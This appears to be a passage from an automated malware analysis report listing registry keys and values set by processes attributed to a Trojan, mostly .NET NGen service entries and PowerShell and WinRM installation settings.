[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process ngen.exe:1980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 A0 B7 C9 5E 2C 5E BF 5B B2 93 B0 57 C4 1C 22"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:1944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 44 41 A0 0B D4 DD 2F 97 EC 6F 0E 88 CE B6 DF"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process ngen.exe:652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 25 33 C1 95 83 1D B2 78 9D 23 70 2B CF 15 12"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:1560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 92 B9 2A A5 7C 9C 89 6E BB 57 50 42 C3 AE A1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
The process ngen.exe:816 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 67 78 D4 86 6A C3 4B 4B 50 52 13 E8 5F 1E 42"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"
The process ngen.exe:1236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B E5 68 E9 32 28 2C F6 59 FB 60 28 A0 84 91 AE"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
The process ngen.exe:560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC 13 D1 F2 71 56 74 F1 78 C1 09 B8 B9 25 7D AD"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
The process ngen.exe:2448 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 2A 4D 59 1E 9A 56 93 EA 32 BE 54 80 02 48 C4"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:2424 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 5D D1 1C CB 63 13 22 6C A2 84 88 50 67 39 66"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:1916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 0A 15 D0 5C 60 D5 63 83 9B 07 7F C4 0C 1C 04"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:1624 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE 24 D9 83 AA 6C C7 B2 6A 0E 37 20 96 84 37 4D"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
The process ngen.exe:4076 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C C5 CA F7 8C BD 11 F6 F6 8A C1 3E 5C B2 78 A6"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
The process ngen.exe:1240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 57 C5 84 38 72 0E 47 1B 66 27 C8 26 C1 6D 32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:2000 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F CA 55 06 90 5B F8 3E BE 57 62 0A 71 92 D6 C2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"
The process ngen.exe:500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 F0 7F 15 0D 17 D6 82 D1 55 02 50 69 97 08 BC"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:1572 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 D5 CA 2E B8 C7 6B 75 45 45 5D 6A 3D AE 52 F3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:1380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A A4 30 7D DA 78 82 8C D6 4A 9C AC DC B1 4F 22"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
The process update.exe:2296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Description" = "Windows Management Framework Core"
[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"StackVersion" = "2.0"
[HKCR\Microsoft.PowerShellModule.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"ControlFlags" = "1"
[HKCR\.psc1]
"(Default)" = "Microsoft.PowerShellConsole.1"
[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "IWSManHostEntrySink"
[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsGetSignature"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\8f8:ad488\iis]
"PathFTPRoot" = "C:\Inetpub\ftproot"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PSCompatibleVersion" = "1.0,2.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoModify" = "1"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"(Default)" = "Microsoft Windows WSMan Provider Host"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"TypesSupported" = "7"
[HKCR\Microsoft.PowerShellModule.1]
"EditFlags" = "131072"
[HKCR\WSMan.InternalAutomation\CurVer]
"(Default)" = "WSMan.InternalAutomation.1"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}]
"(Default)" = "IWSManResourceLocator"
[HKCR\.ps1xml]
"PerceivedType" = "Text"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}]
"(Default)" = "IWSManConnectionOptions"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryCount" = "8"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\FLAGS]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"LogLevel" = "536870912"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKCR\Microsoft.PowerShellScript.1]
"EditFlags" = "131072"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"WINRM" = "WINRM"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"file" = "%WinDir%\System32\config\WindowsPowerShell.evt"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKCR\Microsoft.PowerShellScript.1\shell\Run with PowerShell\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -file %1"
[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"EventMessageFile" = "%systemroot%\system32\WsmRes.dll"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"ServerExecutable" = "%System%\wsmprovhost.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\8f8:ad488\iis]
"PathScripts" = "C:\Inetpub\iissamples\Scripts"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PSModulePath" = "%System%\WindowsPowerShell\v1.0\Modules\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"CoInitializeSecurityParam" = "1"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell]
"Path" = "%System%\WindowsPowerShell\v1.0\powershell.exe"
[HKCR\Microsoft.PowerShellConsole.1]
"FriendlyTypeName" = "Windows PowerShell Console File"
[HKCR\Microsoft.PowerShellModule.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"
[HKCR\WSMan.InternalAutomation]
"(Default)" = "WSMan InternalAutomation Class"
[HKCR\Microsoft.PowerShellData.1]
"FriendlyTypeName" = "Windows PowerShell Data File"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"(Default)" = "%System%\wsmprovhost.exe"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0]
"(Default)" = "Microsoft WSMAN Automation V1.0 Library"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"AuthenticationCapabilities" = "12320"
